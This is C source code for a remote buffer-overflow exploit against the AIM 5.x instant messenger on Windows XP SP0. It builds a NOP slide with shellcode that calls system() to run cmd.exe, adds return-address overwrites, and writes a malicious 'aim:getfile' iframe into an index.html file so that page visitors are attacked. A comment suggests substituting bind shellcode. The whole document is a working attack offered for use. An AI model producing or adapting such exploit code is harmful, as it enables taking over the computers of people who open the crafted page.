/* aim 5x remote buffer overflow exploit */
/* target: windows xp sp0 */

#include <stdio.h>

/* u have to search for a bind shellcode!!! */
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()


int k, jmpback = 0x244ff30 + 100;
char buffer[1200], fstring[1300]; // heh, need to clean this up

int main(int argc, char *argv[]) {
FILE *evil;

fprintf(stdout, "---------------------------------------------\n"

"aim 5x remote exploit(10.11.2003)\n"

" this code is from a mirc exploit\n"

"---------------------------------------------\n\n");



// NOPslides are cool

memset(buffer, 0x90, sizeof(buffer) - 1);



// place shellcode in buffer

memcpy(buffer + (1130-strlen(shellcode)), shellcode, strlen(shellcode));



for(k=1130;k<=sizeof(buffer);k=k+4)

{

memcpy(buffer + k, &jmpback, 4);

}



printf("[+] Evil buffer constructed\n");





// open HTML file for writing

if((evil = fopen("index.html", "a+")) != NULL) {



// construct evil string 

sprintf(fstring, "<iframe src=\"aim:getfile?screenname=%s\"></iframe>", buffer);



// write string to file

fputs(fstring, evil);



// close file

fclose(evil);



printf("[+] Evil HTML file written!\n");

return(0);

} else {

fprintf(stderr, "ERROR: Could not open index.html for writing!\n");

exit(1);

}

}